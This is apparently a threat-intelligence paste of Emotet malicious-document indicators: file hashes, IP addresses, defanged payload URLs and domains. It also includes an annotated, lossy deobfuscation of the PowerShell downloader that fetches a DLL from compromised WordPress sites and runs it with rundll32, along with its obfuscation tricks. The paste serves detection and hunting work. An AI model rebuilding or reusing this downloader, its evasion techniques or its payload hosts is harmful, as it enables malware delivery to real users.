paladin316

Emotet_Doc_out_2020-12-24_16_58.txt

Dec 24th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256 (malicious document samples):
  4. 2edf013ada24ea7a142b0844b980169d465e7f5aefdaf645b44ece962d10d74a
  5. 0149c806df64185dc66ee1fdc857e25ee93def1f7db847487674959d2b9306d1
  6. 036504550e6290a5bd9b8c67b1e7c22de77c5034c8b51865ebe1c1f8d4d339b0
  7. f8863f5eb2872b1d2fa17f58ad4121bb0be5a292c832b3f58a674d3ed705b656
  8. 9683cbca5d42c99f3b67ebfed13fc32aeca9480bfa9aff2d9dcfc70491eb78b6
  9. a61add91d1ec99ec85463137cdefd5a4f56e2bc5885b00b4fdb840347ed6ab4e
  10. b45afeb8876a6d7a2a41a6a679095df9cfcf8df3df1a5b5ebf53c74fff0adde9
  11. f1d5a90c794b7c27d4575632bb1459b05cb49587630b3431839440c23fcb838a
  12. 415ca8fffbcdb3e2deea20cd8dc03d37409c7fc0c175d81364fab2e59738d145
  13. 1d16db1a7cce7979231a4688b0fb2fa02c47f59372c0bb539848b87b97fffdd2
  14. c5681e7f73b34c33d33ebf5aa9e920a9bb1e0af9f6d3260ba9d49ced57a4cde2
  15. 8f1c045c52f380a3dee934291859c8a03f17ef3f96084c3819678fe14f22c0c1
  16. 649918360167560700dc33d77632806bcc52576e640559297ce216691ea5dfd1
  17. 7321c475e384a9cd1c118ee71fa5e977ef762d64c7bdea4cecb33d64046469d4
  18. 6ed5539e92f43fcde23dc6343c4f41a93050576180fad637adc5014a49ed38aa
  19. b4de94cda8d3d1fa626c3bf29a3dae027e74addc6c6c6df1890567aa710670c8
  20. b96bdcbde5a864db016ff0e5d071c9ab68331ac9c87debcf6e019c901fc8678f
  21. 4cc044495efb4f3eb56cb74a8745ee272e83b730e162b661bc796c36df26f849
  22. 768f3c029cc79ae21d7c732487da93f0e8c7d19a83737f9ce7e107e3adc9054c
  23.  
  24.  
  25. IPs (hosts resolved for the URLs below; these look like shared hosting/CDN address space, so prefer the domain and URL indicators over IP-based blocking):
  26. 104.18.38.51
  27. 104.24.114.4
  28. 104.24.115.4
  29. 104.27.153.23
  30. 166.62.71.224
  31. 172.67.137.222
  32. 172.67.212.107
  33. 5.83.32.101
  34. 67.195.197.25
  35.  
  36.  
  37.  
  38. URLs (payload download locations, defanged as hxxp/hxxps; the downloader below tries them in random order and stops at the first response that is large enough to be the DLL):
  39. hxxps://accionistas.balneariodealange.com/rumus-jitu-wkg6v/SIGNUP/
  40. hxxp://andeanreach.com//System/
  41. hxxps://fresh-flowers-galore.com/wp-content/SSChBp8P/
  42. hxxps://travianbot.net/wp-admin/58Crtv/
  43. hxxps://italymining.eu/wp-includes/en-US/
  44. hxxp://biolandmedical.litofis.com/VGX/
  45. hxxp://ciroiluminacion.litofis.com/wp-includes/eKWy/
  46.  
  47.  
  48. Domains (payload hosts; the wp-content/wp-admin/wp-includes paths suggest compromised WordPress sites rather than attacker-registered infrastructure):
  49. accionistas.balneariodealange.com
  50. andeanreach.com
  51. fresh-flowers-galore.com
  52. travianbot.net
  53. italymining.eu
  54. biolandmedical.litofis.com
  55. ciroiluminacion.litofis.com
  56.  
  57.  
  58. Decoded Base64 PowerShell (deobfuscated downloader stage; the decode is lossy — string quotes and call parentheses are missing and stray bytes precede the first statement — so it is not runnable as pasted):
  # Analyst annotation: deobfuscated Emotet maldoc downloader stage recovered from
  # the Base64 blob. The decode is lossy -- string quotes, call parentheses and
  # (apparently) '+' operators were dropped, and stray bytes precede the first
  # statement -- so this is NOT runnable as shown. It is kept byte-for-byte as
  # evidence; only '#' comment lines have been added. URLs are defanged (hxxp).
  #
  # Format-string trick: "{4}{5}{3}{0}{2}{1}" -f sYS,te,M.io.,dir,EcT,oRY
  # reassembles the type name System.IO.Directory; the scrambled case and
  # reordered fragments defeat naive string matching on the script body.
  59. rgrgrgrg���Z��{^��q�jz�趼�������~^<���^,�]z$A5c7 = [TyPE]"{4}{5}{3}{0}{2}{1}" -f dir,oRY,EcT,M.io.,sYS,te;
  # Same trick: reassembles System.Net.ServicePointManager.
  60. $rFs6 =[tYPe]"{4}{5}{2}{1}{0}{3}{6}" -F pOi,erVicE,NeT.s,nT,S,yStEM.,mAnaGer ;
  # Junk assignments ($Sw360o2, $Y7_dxjn, $S39xfwk, ...) are interleaved through
  # the whole script and are never read by the download logic below.
  61. $Sw360o2=R0vc04i;
  # [char]64 is '@'. This builds part of the delimiter later handed to "split"
  # (the concatenation operators appear to have been lost in the decode).
  62. $Ks4z1od=$Rfw0xrv [char]64 $W9i2lzo;
  63. $Y7_dxjn=Ygoe0qz;
  # (Get-ChildItem variable:a5C7).Value::CreateDirectory(...) -- [char]92 is '\',
  # so this creates the drop folder %USERPROFILE%\P1qccus\Q9ow42u\.
  # Hunting: look for this directory name under user profiles.
  64. cHilDiTEM vArIabLe:a5C7.vALuE::"C`REaTe`diRECtOry"$HOME {0}P1qccus{0}Q9ow42u{0}-F [chAR]92;
  65. $S39xfwk=Au_bga9;
  # Forces TLS 1.2 on ServicePointManager before the WebClient downloads.
  66. varIAblE RFS6.vAlUe::"securi`Typ`ROtocOl" = Tls12;
  67. $O0ec5e_=Uoaqdrj;
  # $Unv6y1k ("Foau33r") becomes the base name of the dropped DLL.
  68. $Unv6y1k = Foau33r;
  69. $P3ddjmb=Foualxa;
  70. $Us62v6e=Hv43aoi;
  # Drop path: the token "1dH" is a placeholder that -CReplace turns into
  # [char]92 ('\'), yielding %USERPROFILE%\P1qccus\Q9ow42u\Foau33r.dll.
  71. $A3sgycu=$HOME1dHP1qccus1dHQ9ow42u1dH -CReplace1dH,[chAr]92$Unv6y1k.dll;
  72. $M4sbb8f=Jci18id;
  # Downloader object. The backticks inside New-Object, DownloadFile etc. are
  # PowerShell escape characters used to split cmdlet/method names for evasion.
  73. $Ke7onk9=NEW`-o`BJ`eCT nEt.WEBCLieNt;
  # Payload URL list (seven hosts, same as the URLs section above). In the
  # original this is one string that "replace"/"split" turn into an array using a
  # delimiter built from $Jo3j922 + $Ks4z1od + $Qt4ztj9 (the '@' from above); the
  # paste already shows the entries one per line.
  74. $Zjjthui=hxxps://accionistas.balneariodealange.com/rumus-jitu-wkg6v/SIGNUP/
  75. hxxp://andeanreach.com//System/
  76. hxxps://fresh-flowers-galore.com/wp-content/SSChBp8P/
  77. hxxps://travianbot.net/wp-admin/58Crtv/
  78. hxxps://italymining.eu/wp-includes/en-US/
  79. hxxp://biolandmedical.litofis.com/VGX/
  80. hxxp://ciroiluminacion.litofis.com/wp-includes/eKWy/."rep`l`AcE"/,[array]/,hwe[0]."spl`iT"$Jo3j922 $Ks4z1od $Qt4ztj9;
  81. $E3ute_v=Jontwpx;
  # Iterates the URLs in random order (Sort-Object {Get-Random}) and downloads
  # each candidate straight to the .dll path; any failure is caught below.
  82. foreach $Z0f_u3s in $Zjjthui | SOR`T-o`BjE`ct {g`E`T-rANDoM}{try{$Ke7onk9."do`w`NLOaDF`ILE"$Z0f_u3s, $A3sgycu;
  83. $Mhoww_6=B2oseq8;
  # Only executes if the downloaded file is at least 32511 bytes (presumably to
  # skip error pages or truncated bodies), then launches it with
  # rundll32 <path>,#1 (export ordinal 1) and breaks out after the first success.
  # Detection: rundll32 loading a DLL from a user-profile path by ordinal.
  84. If &Get-Item $A3sgycu."le`NGtH" -ge 32511 {&rundll32 $A3sgycu,#1."t`OSTr`iNG";
  85. $Jufzvro=X7tnhei;
  86. break;
  # The empty catch{} swallows download errors so the loop silently moves on to
  # the next URL.
  87. $Sim6mjg=Vrovd38}}catch{}}$Gpi6so8=A4zdmn5
  88.  